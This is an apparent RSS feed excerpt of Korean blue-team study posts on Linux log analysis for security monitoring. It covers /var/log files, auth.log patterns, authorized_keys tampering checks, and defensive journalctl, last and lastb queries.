this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;455&quot; height=&quot;196&quot; data-origin-width=&quot;455&quot; data-origin-height=&quot;196&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 여러 계정에 대해 실패 로그가 산발적으로 발생&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 시도 간격이 느려 탐지가 까다로움&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 동일 IP에서 여러 계정으로 로그인 시도 패턴이 보임&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;Operational Error (운영 오류)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 공격이 아닌, 시스템 내부 설정이나 서비스 계정의 인증 정보 불일치 시 발생하는 현상&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;= 내부 서버 + 서비스 계정&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignLeft&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;429&quot; data-origin-height=&quot;111&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/41xeA/dJMcadIsi9o/bT3MBfKaEuKS0wA1SSncf0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/41xeA/dJMcadIsi9o/bT3MBfKaEuKS0wA1SSncf0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/41xeA/dJMcadIsi9o/bT3MBfKaEuKS0wA1SSncf0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F41xeA%2FdJMcadIsi9o%2FbT3MBfKaEuKS0wA1SSncf0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;429&quot; height=&quot;111&quot; data-origin-width=&quot;429&quot; data-origin-height=&quot;111&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- `backup-svc`와 같은 특정 서비스 계정에서 일정한 시간 간격으로 실패 반복&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 출발지가 내부 IP이거나 특정 주기성을 가지고 반복됨&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[8-3] 키 기반 인증 (Key-based Authentication) 환경 분석&lt;/b&gt;&lt;/h3&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;[ `authorized_keys` 변경 위험 ]&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;공격자가 서버에 접근한 뒤, 자신의 공개키를 `&lt;b&gt;~/.ssh/authorized_keys`&lt;/b&gt;파일에 추가하면 생기는 문제점&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; &lt;b&gt;재진입 가능&lt;/b&gt; = 사용자가 비밀번호를 변경해도 공격자는 키를 통해 언제든 로그인 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; &lt;b&gt;가시성 부재&lt;/b&gt; = &lt;b&gt;auth.log&lt;/b&gt;&lt;span style=&quot;color: #9d9d9d;&quot;&gt;(표준 인증 로그)&lt;/span&gt;에는 정상 사용자의 키인지 탈취된 키인지 직접 기록 안 됨&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; &lt;b&gt;보강 필수&lt;/b&gt; = 텍스트 로그만으론 부족해 auditd, FIM, EDR 등의 보강 필요&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;[ 분석 흐름 ]&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;1. Accepted publickey 확인&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 인증 성공 로그 포착 후, 해당 사용자의 키 인증 패턴이 평소와 맞는지 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;2. authorized_keys 파일 점검&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;b&gt;mtime&lt;/b&gt;&lt;span style=&quot;color: #9d9d9d;&quot;&gt;(파일의 수정 시간)&lt;/span&gt;을 확인해 변경 여부 파악&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- auditd 감사 로그가 있다면, 파일을 건드린 사용자를 역추적함&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;3. key fingerprint 비교&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 로그에 기록된 key의 fingerprint를 사전에 등록된 정상 키 목록과 대조하여 미인가 키인지 판별&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;4. 직전 sudo/권한 상승 추적&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 키가 심어지기 전, 비정상적인 권한 상승(&lt;b&gt;sudo&lt;/b&gt;)이나 설정 변경 행위가 있었는지 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[8-4] 세션 관점의 데이터 확보&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;last&lt;/b&gt;&lt;/span&gt; &lt;b&gt;(로그인 성공 기록 + 세션 지속 시간)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 과거부터 현재까지의 전체 로그인/로그아웃 이력 조회&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 특정 사용자의 세션의 유지 기간을 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #5733b1;&quot;&gt;lastb&lt;/span&gt; (실패 패턴 흔적)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 실패한 로그인 시도만 기록된 `&lt;b&gt;/var/log/btmp&lt;/b&gt;` 파일 조회&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 특정 IP에서 반복되는 brute force 공격의 흔적을 빠르게 식별&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #5733b1;&quot;&gt;who&lt;/span&gt; / &lt;span style=&quot;color: #5733b1;&quot;&gt;w&lt;/span&gt; (현재 접속 중인 사용자 확인)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 현재 시스템에 로그인해 있는 사용자 목록 조회&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 사고 의심 시 생존해있는 세션을 확인하여 대응 우선순위 결정&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;[Blue Team] EP.8 - 로그인 및 인증 로그 분석. &lt;span style=&quot;color: #ee2323;&quot;&gt;END.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;</description>
      <category>Blue Team (SOC)/Linux Log Analysis</category>
      <category>Blue Team</category>
      <category>cert</category>
      <category>Cyber Security</category>
      <category>IR</category>
      <category>linux</category>
      <category>log</category>
      <category>SoC</category>
      <category>보안 관제</category>
      <category>정보보안</category>
      <category>해킹 스터디</category>
      <author>AnbyMata</author>
      <guid isPermaLink="true">https://anbymata.tistory.com/70</guid>
      <comments>https://anbymata.tistory.com/70#entry70comment</comments>
      <pubDate>Wed, 22 Apr 2026 22:00:44 +0900</pubDate>
    </item>
    <item>
      <title>[Blue Team] EP.7 - Linux 로그 구조 및 파일 체계</title>
      <link>https://anbymata.tistory.com/69</link>
      <description>&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[7-1] Linux 로그의 기본 지도 - /var/log&amp;nbsp;&lt;/b&gt;&lt;/h3&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;인증 및 권한 (Auth &amp;amp; Permission)&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;/var/log/&lt;/span&gt;auth.log&lt;/b&gt;&lt;/span&gt; (Ubuntu/Debian) &lt;b&gt;&amp;amp;&lt;/b&gt; &lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;/var/log/&lt;/span&gt;secure&lt;/b&gt;&lt;/span&gt; (RHEL 계열)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 사용자 로그인 성공/실패, &lt;b&gt;sudo&lt;/b&gt; 권한 상승, &lt;b&gt;su&lt;/b&gt; 전환 등 인증과 관련된 기록들&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;시스템 및 서비스 (System &amp;amp; Service)&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;/var/log/&lt;/span&gt;syslog&lt;/b&gt;&lt;/span&gt; (Ubuntu/Debian) &lt;b&gt;&amp;amp;&lt;/b&gt; &lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;/var/log/&lt;/span&gt;messages&lt;/b&gt;&lt;/span&gt; (RHEL 계열)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 시스템 전반의 운영 메시지 및 커널 로그 기록들&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;/var/log/&lt;/span&gt;kern.log&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;(Ubuntu/Debian) &lt;b&gt;&amp;amp;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt; /var/log/&lt;/span&gt;dmesg&lt;/span&gt;&lt;/b&gt; (RHEL 계열)&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&amp;rarr;&lt;span&gt; 커널 수준에서 발생하는 하드웨어 및 드라이버 관련 메시지&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;journalctl&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&amp;rarr;&lt;span&gt;&lt;b&gt; systemd&lt;/b&gt; 기반의 바이너리 로그를 조회하는 도구.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&amp;rarr; 전통적인 파일 로그에 남지 않은 서비스 단위의 상세 내역 확인에 사용&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;감사 및 행위 (Audit &amp;amp; Behavior)&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;/var/log/&lt;/span&gt;audit/audit.log&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&amp;rarr;&lt;span&gt;&lt;b&gt; auditd&lt;/b&gt; 서비스가 기록하는 커널 수준의 감사 로그 기록들&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&amp;rarr; 파일 접근이나 명령어 실행등의 정밀 분석에 사용&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;-&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt; ~/&lt;/span&gt;.bash_history&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&amp;rarr; 사용자가 shell에서 입력한 명령어 기록들&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&amp;rarr; 조작 가능성이 높아 보조 지표로만 사용&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt; 세션 및 접속 기록 (Session Records) &lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;- /var/log/&lt;span style=&quot;color: #006dd7;&quot;&gt;wtmp&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt; &amp;rarr; 과거 및 현재의 로그인/로그아웃 전체 기록&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;- /var/log/&lt;span style=&quot;color: #006dd7;&quot;&gt;btmp&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 실패한 로그인 시도들만 기록&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; brute force 공격 탐지에 효과적&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;- /var/log/&lt;span style=&quot;color: #006dd7;&quot;&gt;lastlog&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 계정별 마지막 로그인 시각&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[7-2] auth.log / secure 주요 기록&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;- SSH 인증 실패 &lt;/b&gt;(Failed password, Failed publickey)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;+ invalid user(외부 IP가 존재하니 않는 계정)이나 root(관리자 계정)으로 접속 시도&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;+ brute force (무차별 대입) 공격의 직접적인 증거&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;- SSH 인증 성공 &lt;/b&gt;(Accepted password, Accepted publickey)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;+ 인증이 성공하여 세션이 열린 기록&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;+ 평소와 다른 시간대나 생소한 IP에서의 인증 성공은 계정 탈취의 가능성일 수 있음&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;- 권한 상승 및 전환&lt;/b&gt; (sudo, su)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;+ 일반 사용자가 관리자 권한을 획득하거나 다른 계정으로 전환한 기록&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;- PAM 및 세션 관련 메시지&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;+ 계정 잠금, 정책 위반 기록&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;+ 세션의 시작과 종료 (session opened/closed)를 기록하여 공격자의 체류 시간 파악&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[7-3] syslog / messages 주요 기록&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;- 서비스 운영 및 프로세스 실행 추적&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;+ systemd나 각종 데몬의 시작/중지 이력 및 서비스 제어 기록&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&amp;nbsp;&amp;rarr;&lt;span&gt;&lt;b&gt; auth.log&lt;/b&gt; 에서 성공한 로그인 시점 확인 후, 같은 시각 &lt;b&gt;syslog&lt;/b&gt; 에서 어떤 서비스나 의심스러운 프로세스가 설행되었는지 대조하여 로그인 직후의 행위를 추적&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;- 스케줄러 (cron) 기반 지속성 감시&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&amp;nbsp;+ 예약된 스케줄러 (&lt;b&gt;cron&lt;/b&gt;)가 실행된 시점과 실행된 명령어 기록&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 야간, 주말 등의 취약 시간대에 실행된 비정상적인 &lt;b&gt;cron&lt;/b&gt; 기록을 통해 공격자가 재부팅 후에도 권한 유지를 위해 심어둔 persistence&lt;span style=&quot;color: #9d9d9d;&quot;&gt;(지속성 유지)&lt;/span&gt; 수단을 찾음&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;- 시스템 이상 징후 및 장애 분석&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;+ 서비스 장애, 커널 오류, 네트워크 상태 변경 등 시스템의 전반적인 오류와 경고 메시지 기록&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 서비스의 갑작스런 재시작 또는 로그 삭제 시도 흔적이 공격자의 활동 시간과 일치하는지 확인해 안과관계 증명&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;- 애플리케이션 계층 공격 탐지&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;+ Nginx나 Apache 같은 웹 서버가 &lt;b&gt;syslog&lt;/b&gt; 로 보내는 상세 에러 메시지 기록&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 웹 서비스 공격 (&lt;b&gt;access.log&lt;/b&gt;) 징후가 보이면, 즉시 &lt;b&gt;syslog&lt;/b&gt; 에서 관련 서비스의 비정상 종료나 상세 에러를 확인해 공격의 실체와 성공 여부 파악&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[7-4] journalctl&amp;nbsp;&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;-&lt;b&gt; journalctl &lt;/b&gt;= &lt;b&gt;systemd-journald &lt;/b&gt;서비스가 수집한 바이러이 형식의 로그를 조회하는 도구&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 공격자가 흔적 제거를 위해 &lt;b&gt;/var/log/auth.log&lt;/b&gt; 같은 텍스트 파일을 삭제해도 바이너리 저널에 원본이 남아 있을 수 있음&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 서비스별 깔끔한 필터링 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 부팅 세션별로 로그가 구분되어 사고 타임라인 구성이 편리&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 기본 설정에 따라 재부팅 시 로그 소실 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 보통 SIEM 수집기는 파일 로그 기반이라, 저널 로그가 텍스트 파일로 정상 전달되는지 점검 필요&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;journalctl 주요 명령어&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;1. 침투 흔적 및 실시간 모니터링&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- `&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;journalctl -xe&lt;/b&gt;&lt;/span&gt;`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 시스템의 최신 이벤트와 상세 오류 메시지 함께 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- `&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;journalctl -u sshd&lt;/b&gt;&lt;/span&gt;`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; &amp;nbsp;SSH 서비스 관련 로그만 필터링하여 조회&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;2. 특정 시간대 및 조건별 추적&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- `&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;journalctl -u cron --since &quot;2026-04-20 00:00:00&lt;/b&gt;&quot;&lt;/span&gt;`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 특정 시점 이후의 예약 작업 실행 기록 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- `&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;journalctl _COMM=sudo&lt;/b&gt;&lt;/span&gt;`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; &lt;b&gt;sudo&lt;/b&gt; 명령을 실행한 기록만 필터링하여 조회&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- `&lt;span data-path-to-node=&quot;6,0,1,0&quot;&gt;&lt;span&gt;&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;journalctl -k&lt;/b&gt;&lt;/span&gt;`&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span data-path-to-node=&quot;6,0,1,1&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span data-path-to-node=&quot;6,0,1,0&quot;&gt;&lt;span&gt;&amp;nbsp;&amp;rarr; kernel에서 발생하는 이벤트만 필터링하여 조회&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
